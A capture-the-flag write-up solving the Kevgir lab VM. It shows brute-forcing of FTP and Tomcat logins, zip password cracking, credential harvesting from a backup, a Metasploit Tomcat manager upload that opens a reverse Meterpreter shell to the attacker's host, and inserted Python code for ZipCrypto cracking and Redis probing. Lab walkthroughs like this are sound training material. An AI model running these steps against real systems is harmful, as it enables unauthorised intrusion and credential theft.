Mr_H4sh

Infosec, CTF and more

Kevgir Solution

In this post I’m going to show you how to solve the Kevgir VM provided by the team of canyoupwn.me.

You can find the VM on this link.

192.168.56.102 <== attacker
192.168.56.101 <== victim

I run an nmap scan of the victim host and this is what I find:

nmap -sT -p- -Pn -n -v 192.168.56.101 -T5

Nmap scan report for 192.168.56.101
Host is up (0.00037s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1322/tcp  open  novation
2049/tcp  open  nfs
6379/tcp  open  unknown
8080/tcp  open  http-proxy
8081/tcp  open  blackice-icecap
9000/tcp  open  cslistener
35064/tcp open  unknown
40223/tcp open  unknown
42904/tcp open  unknown
46240/tcp open  unknown
52717/tcp open  unknown
57163/tcp open  unknown
58194/tcp open  unknown

Port 25 is open, and nmap labels it smtp, but when I connect to it the banner shows vsftpd: an FTP server has been put on the SMTP port. The server only asks for a password once a username has been entered, so I point medusa at the admin account with the rockyou wordlist, and it finds a password:

# medusa -h 192.168.56.101 -n 25 -u admin -P /usr/share/wordlists/rockyou.txt -M ftp
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

[...]
ACCOUNT CHECK: [ftp] Host: 192.168.56.101 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (19819 of 14344391 complete)
ACCOUNT FOUND: [ftp] Host: 192.168.56.101 User: admin Password: admin [SUCCESS]

So I have FTP access on port 25 as admin:admin, which I confirm by hand:

# ftp 192.168.56.101 25
Connected to 192.168.56.101.
220 (vsFTPd 3.0.2)
Name (192.168.56.101:root): admin
331 Please specify the password.
Password: admin
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Port 2049 (nfs) is also open, so I list the exports with showmount and mount the one I find:

# showmount -e 192.168.56.101

Export list for 192.168.56.101:
/backup *

# mkdir /media/backup
# mount 192.168.56.101:/backup /media/backup

# ls -l /media/backup
total 12752
-rw-r--r-- 1 root root 13058028 Feb 15 02:35 backup.tar.bz2.zip

# unzip backup.tar.bz2.zip 
Archive:  backup.tar.bz2.zip
[backup.tar.bz2.zip] backup.tar.bz2 password: 

The archive is password-protected. I use fcrackzip in brute-force mode (-b), with -u so that each candidate is verified by actually unzipping rather than trusting the cheap header check alone:

# fcrackzip -b -u -v backup.tar.bz2.zip
found file 'backup.tar.bz2', (size cp/uc 13057834/13076586, flags 9, chk 28e3)


PASSWORD FOUND!!!!: pw == aaaaaa
# unzip backup.tar.bz2.zip 
Archive:  backup.tar.bz2.zip
[backup.tar.bz2.zip] backup.tar.bz2 password: aaaaaa
  inflating: backup.tar.bz2          

# ls
backup.tar.bz2 backup.tar.bz2.zip

# bunzip2 backup.tar.bz2
# ls
backup.tar backup.tar.bz2

# tar -xvf backup.tar
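
To show what fcrackzip is actually doing in the step above, here is an added example (mine, not part of the original post and not fcrackzip's code) that implements the traditional PKWARE "ZipCrypto" cipher in Python, builds a small encrypted entry from constructed plaintext under the password aaaaaa, and cracks it with a short constructed wordlist. The 12-byte encryption header and its check byte are what fcrackzip tests first; because that check is a single byte, roughly one wrong password in 256 gets through it, which is why the -u flag above re-verifies every hit with unzip. The example does the same by checking the full CRC-32 of the decrypted data. The plaintext, header prefix and wordlist are assumptions; in a real archive the header prefix is random.

```python
import zlib
from typing import Iterable, Optional, Tuple

# CRC-32 table (reflected polynomial 0xEDB88320); the key schedule reuses it.
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (0xEDB88320 ^ (_c >> 1)) if _c & 1 else (_c >> 1)
    _CRC_TABLE.append(_c)


def _crc32_step(crc: int, byte: int) -> int:
    return _CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Traditional PKWARE stream cipher ("ZipCrypto"), APPNOTE.TXT section 6.1."""

    def __init__(self, password: bytes) -> None:
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, plain_byte: int) -> None:
        self.k0 = _crc32_step(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)            # the state advances on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def encrypt_entry(plaintext: bytes, password: bytes, header_prefix: bytes) -> Tuple[bytes, int]:
    """Build the encrypted body of a STORED entry: a 12-byte header then the data.
    Byte 12 of the header is the high byte of the plaintext CRC-32, the only
    thing a reader can check before decrypting the whole entry."""
    if len(header_prefix) != 11:
        raise ValueError("header prefix must be 11 bytes")
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = header_prefix + bytes([crc >> 24])
    return ZipCrypto(password).encrypt(header + plaintext), crc


def quick_check(body: bytes, crc: int, password: bytes) -> bool:
    """The cheap test run on every candidate: decrypt only the 12-byte header and
    compare its last byte with the CRC's high byte. A wrong password passes this
    about once in 256 tries, so a hit is a candidate, not an answer."""
    return ZipCrypto(password).decrypt(body[:12])[11] == crc >> 24


def full_check(body: bytes, crc: int, password: bytes) -> bool:
    """Decrypt the whole entry and verify its CRC-32; this is what -u achieves by
    handing each candidate to unzip."""
    plain = ZipCrypto(password).decrypt(body)[12:]
    return (zlib.crc32(plain) & 0xFFFFFFFF) == crc


def crack(body: bytes, crc: int, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Return the first password that survives both checks, or None."""
    for candidate in wordlist:
        if quick_check(body, crc, candidate) and full_check(body, crc, candidate):
            return candidate
    return None


# Constructed stand-in for backup.tar.bz2 (bzip2 magic plus filler), not the VM's file.
SAMPLE_PLAINTEXT = b"BZh91AY&SY" + b"constructed backup contents\n" * 4
SAMPLE_PASSWORD = b"aaaaaa"
SAMPLE_HEADER_PREFIX = bytes(range(1, 12))     # would be random in a real archive
SAMPLE_BODY, SAMPLE_CRC = encrypt_entry(SAMPLE_PLAINTEXT, SAMPLE_PASSWORD, SAMPLE_HEADER_PREFIX)
SAMPLE_WORDLIST = [b"123456", b"password", b"aaaaa", b"aaaaaa", b"aaaaaaa"]

if __name__ == "__main__":
    print("password:", crack(SAMPLE_BODY, SAMPLE_CRC, SAMPLE_WORDLIST))
```

The key schedule is the same one Python's zipfile module uses when reading encrypted archives, so the check logic carries over directly to real files: read the local file header, take the 12 bytes after it as the encryption header, and use the CRC from the header (or the high byte of the DOS time when bit 3 of the flags is set).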

Extracting the tarball gives a folder called html containing the source code of several web applications, full of useful information: credentials, which database is in use, secret keys and so on. So far I have found:

Users:
root
admin
nobody
joomlauser

Passwords: 
p@ssw0rd
password
toor
1m4dm1n!
baz

Secret Keys:
phn4U0DCRrlLzM5M

I visit http://192.168.56.101:80/ and find a web page. I run nikto against it, which reports a /phpmyadmin/ directory. http://192.168.56.101:80/phpmyadmin/ is the phpMyAdmin login page; I try the credentials gathered from the backup, and root:toor gets me in.

Next I check port 8080, which serves Apache Tomcat 7. The front page links to the manager application at http://192.168.56.101:8080/manager/html, which prompts for credentials, so I use the Metasploit tomcat_mgr_login scanner to test the default user:password pairs:

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(tomcat_mgr_login) > exploit

[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 192.168.56.101:8080 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Metasploit has successfully found the default login tomcat:tomcat. I double check and it works.

With valid manager credentials I can deploy a WAR, so I use the tomcat_mgr_upload exploit to get a shell on the system:

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(tomcat_mgr_upload) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_upload) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(tomcat_mgr_upload) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_upload) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

msf exploit(tomcat_mgr_upload) > set PAYLOAD  java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   tomcat           no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.56.101   yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   USERNAME   tomcat           no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(tomcat_mgr_upload) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080

msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying KouAIza32aSW4YGjeDWv...
[*] Executing KouAIza32aSW4YGjeDWv...
[*] Undeploying KouAIza32aSW4YGjeDWv ...
[*] Sending stage (2952 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:53214) at 2016-03-26 17:24:20 +0000

ls
common
conf
logs
server
shared
webapps
work

id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

Next I look at port 6379. I connect with netcat and send a few commands by hand, and the error strings tell me what is listening:

# nc 192.168.56.101 6379
a
-ERR unknown command 'a'
help
-ERR unknown command 'help'
helo
-ERR unknown command 'helo'
GET
-ERR wrong number of arguments for 'get' command
GET a
$-1

The replies (-ERR ... for unknown commands, $-1 for a missing key) are Redis protocol replies, so I use Metasploit again to pull whatever information the server will give without authentication.

msf > search redis

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   auxiliary/scanner/misc/redis_server                                        normal     Redis-server Scanner
   auxiliary/scanner/redis/file_upload                       2015-11-11       normal     Redis File Upload
   auxiliary/scanner/redis/redis_server                                       normal     Redis Scanner
   exploit/windows/browser/ie_createobject                   2006-04-11       excellent  MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution
   exploit/windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   exploit/windows/browser/webex_ucf_newobject               2008-08-06       good       WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
   exploit/windows/email/ms07_017_ani_loadimage_chunksize    2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)


msf > use auxiliary/scanner/redis/redis_server
msf auxiliary(redis_server) > show options

Module options (auxiliary/scanner/redis/redis_server):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   COMMAND   INFO             yes       The Redis command to run
   Password  foobared         no        Redis password for authentication test
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port
   THREADS   1                yes       The number of concurrent threads

msf auxiliary(redis_server) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(redis_server) > exploit

[+] 192.168.56.101:6379   - Found redis with INFO command: $1904\x0d\x0a# Server\x0d\x0aredis_version:3.0.7\x0d\x0aredis_git_sha1:00000000\x0d\x0aredis_git_dirty:0\x0d\x0aredis_build_id:aa70bcb321ba8313\x0d\x0aredis_mode:standalone\x0d\x0aos:Linux 3.19.0-25-generic i686\x0d\x0aarch_bits:32\x0d\x0amultiplexing_api:epoll\x0d\x0agcc_version:4.8.4\x0d\x0aprocess_id:1196\x0d\x0arun_id:61ec56a645b040c43367f92971e0d6df69f65c04\x0d\x0atcp_port:6379\x0d\x0auptime_in_seconds:1101\x0d\x0auptime_in_days:0\x0d\x0ahz:10\x0d\x0alru_clock:14967331\x0d\x0aconfig_file:/etc/redis/6379.conf\x0d\x0a\x0d\x0a# Clients\x0d\x0aconnected_clients:1\x0d\x0aclient_longest_output_list:0\x0d\x0aclient_biggest_input_buf:0\x0d\x0ablocked_clients:0\x0d\x0a\x0d\x0a# Memory\x0d\x0aused_memory:637624\x0d\x0aused_memory_human:622.68K\x0d\x0aused_memory_rss:8929280\x0d\x0aused_memory_peak:637624\x0d\x0aused_memory_peak_human:622.68K\x0d\x0aused_memory_lua:24576\x0d\x0amem_fragmentation_ratio:14.00\x0d\x0amem_allocator:jemalloc-3.6.0\x0d\x0a\x0d\x0a# Persistence\x0d\x0aloading:0\x0d\x0ardb_changes_since_last_save:0\x0d\x0ardb_bgsave_in_progress:0\x0d\x0ardb_last_save_time:1457806806\x0d\x0ardb_last_bgsave_status:ok\x0d\x0ardb_last_bgsave_time_sec:-1\x0d\x0ardb_current_bgsave_time_sec:-1\x0d\x0aaof_enabled:0\x0d\x0aaof_rewrite_in_progress:0\x0d\x0aaof_rewrite_scheduled:0\x0d\x0aaof_last_rewrite_time_sec:-1\x0d\x0aaof_current_rewrite_time_sec:-1\x0d\x0aaof_last_bgrewrite_status:ok\x0d\x0aaof_last_write_status:ok\x0d\x0a\x0d\x0a# 
Stats\x0d\x0atotal_connections_received:1\x0d\x0atotal_commands_processed:0\x0d\x0ainstantaneous_ops_per_sec:0\x0d\x0atotal_net_input_bytes:14\x0d\x0atotal_net_output_bytes:0\x0d\x0ainstantaneous_input_kbps:0.00\x0d\x0ainstantaneous_output_kbps:0.00\x0d\x0arejected_connections:0\x0d\x0async_full:0\x0d\x0async_partial_ok:0\x0d\x0async_partial_err:0\x0d\x0aexpired_keys:0\x0d\x0aevicted_keys:0\x0d\x0akeyspace_hits:0\x0d\x0akeyspace_misses:0\x0d\x0apubsub_channels:0\x0d\x0apubsub_patterns:0\x0d\x0alatest_fork_usec:0\x0d\x0amigrate_cached_sockets:0\x0d\x0a\x0d\x0a# Replication\x0d\x0arole:master\x0d\x0aconnected_slaves:0\x0d\x0amaster_repl_offset:0\x0d\x0arepl_backlog_active:0\x0d\x0arepl_backlog_size:1048576\x0d\x0arepl_backlog_first_byte_offset:0\x0d\x0arepl_backlog_histlen:0\x0d\x0a\x0d\x0a# CPU\x0d\x0aused_cpu_sys:13.12\x0d\x0aused_cpu_user:0.30\x0d\x0aused_cpu_sys_children:0.00\x0d\x0aused_cpu_user_children:0.00\x0d\x0a\x0d\x0a# Cluster\x0d\x0acluster_enabled:0\x0d\x0a\x0d\x0a# Keyspace
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The server answered INFO without any AUTH command, so no requirepass is set, and the dump tells me a lot about the system: Redis 3.0.7 on a 32-bit Linux 3.19 kernel, running standalone with its config file at /etc/redis/6379.conf. That is a lot for an unauthenticated client to learn, but at this point I still need a way to turn it into a shell on the system.
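
The netcat session and the Metasploit INFO dump above both speak Redis's wire protocol, RESP. As an added example (mine, not part of the original post or of the Metasploit module), here is a small Python RESP client: it encodes commands the way redis-cli does, parses the reply types seen above (the -ERR errors and the $-1 null for a missing key), turns the INFO text into a dictionary, and reports whether the server answers with NOAUTH, which is the one-line check for whether requirepass is set. The embedded INFO reply is trimmed from the output shown on this page and re-encoded as the server sends it; the host and port used by the live probe are assumptions.

```python
import socket
from typing import Any, Dict, Optional, Tuple


class RespError(Exception):
    """An error reply from the server: a line beginning with '-'."""


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, the form redis-cli sends.
    (The inline form typed into nc above also works; this is the real protocol.)"""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_reply(buf: bytes) -> Tuple[Any, bytes]:
    """Parse one reply from buf; return (value, unconsumed bytes).
    Raises RespError for '-' replies and ValueError if the buffer is incomplete."""
    end = buf.find(b"\r\n")
    if end < 0:
        raise ValueError("incomplete reply")
    kind, line, rest = buf[:1], buf[1:end], buf[end + 2:]
    if kind == b"+":                       # simple string, e.g. +PONG
        return line.decode(), rest
    if kind == b"-":                       # error, e.g. -ERR unknown command 'a'
        raise RespError(line.decode())
    if kind == b":":                       # integer
        return int(line), rest
    if kind == b"$":                       # bulk string; $-1 is the null that GET a got
        n = int(line)
        if n < 0:
            return None, rest
        if len(rest) < n + 2:
            raise ValueError("incomplete bulk string")
        return rest[:n].decode(errors="replace"), rest[n + 2:]
    if kind == b"*":                       # array of nested replies
        n = int(line)
        if n < 0:
            return None, rest
        items = []
        for _ in range(n):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError("unknown reply type %r" % kind)


def parse_info(text: str) -> Dict[str, Dict[str, str]]:
    """Split the INFO text into {section: {field: value}}; sections start with '#'."""
    sections: Dict[str, Dict[str, str]] = {}
    current = "general"                    # fields before the first section header
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#"):
            current = line[1:].strip().lower()
        elif ":" in line:
            key, value = line.split(":", 1)
            sections.setdefault(current, {})[key] = value
    return sections


def auth_required(reply: bytes) -> bool:
    """True when the server refused the command with NOAUTH, i.e. requirepass is set.
    The instance on this page answered INFO directly, so for it this is False."""
    try:
        parse_reply(reply)
    except RespError as exc:
        return str(exc).startswith("NOAUTH")
    return False


def summarize(info_reply: bytes) -> Dict[str, Optional[str]]:
    """Pull the fields worth noting from a raw INFO reply."""
    body, _ = parse_reply(info_reply)
    server = parse_info(body).get("server", {})
    return {k: server.get(k) for k in ("redis_version", "os", "config_file")}


def probe(host: str, port: int = 6379, timeout: float = 3.0) -> Dict[str, Any]:
    """Live check against an assumed host/port: send INFO, report auth status and version."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("INFO"))
        buf = b""
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                raise ConnectionError("server closed the connection mid-reply")
            buf += chunk
            try:
                summary = summarize(buf)
            except ValueError:             # reply not complete yet, keep reading
                continue
            except RespError as exc:
                return {"auth_required": str(exc).startswith("NOAUTH"), "error": str(exc)}
            return dict(auth_required=False, **summary)


# Trimmed from the INFO reply shown on this page, re-encoded as the server sends it.
SAMPLE_INFO_BODY = (
    b"# Server\r\nredis_version:3.0.7\r\nredis_mode:standalone\r\n"
    b"os:Linux 3.19.0-25-generic i686\r\ntcp_port:6379\r\n"
    b"config_file:/etc/redis/6379.conf\r\n\r\n# Clients\r\nconnected_clients:1\r\n"
)
SAMPLE_INFO_REPLY = b"$%d\r\n%s\r\n" % (len(SAMPLE_INFO_BODY), SAMPLE_INFO_BODY)

if __name__ == "__main__":
    import sys
    print(summarize(SAMPLE_INFO_REPLY))
    if len(sys.argv) > 1:                  # e.g. python3 resp_probe.py 192.168.56.101
        print(probe(sys.argv[1]))
```

The probe accumulates bytes until a whole reply parses, because a large INFO bulk string rarely arrives in a single recv; the Metasploit module's one-line dump above is the same bulk string with its \r\n separators escaped.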

Next I check port 8081, where there is a website running Joomla. I fetch the response headers with netcat:

# nc 192.168.56.101 8081
HEAD / HTTP/1.1
Host: 192.168.56.101

HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 18:37:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Set-Cookie: 2837a59c63a65a4dec38297efe446470=ntdjn4961gjcj80rpbvbkfkbu5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 12 Mar 2016 18:37:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8

The page source reveals that the Joomla version is 1.5. To be sure, I confirm it with Metasploit's joomla_version scanner:

msf > use auxiliary/scanner/http/joomla_version
msf auxiliary(joomla_version) > show options

Module options (auxiliary/scanner/http/joomla_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the Joomla application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_version) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(joomla_version) > set RPORT 8081
RPORT => 8081
msf auxiliary(joomla_version) > exploit

[*] Server: Apache/2.4.7 (Ubuntu)
[*] Joomla version: 1.5.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And yes, the version is 1.5.0.

I request http://192.168.56.101:8081/robots.txt, and it lists the paths the site asks crawlers not to index:

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/

I also check http://192.168.56.101:8081/administrator/ and find the administration login page.

I run nikto to check for some more information:

# nikto -h http://192.168.56.101:8081/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        8081
+ Start Time:         2016-03-12 19:12:28 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
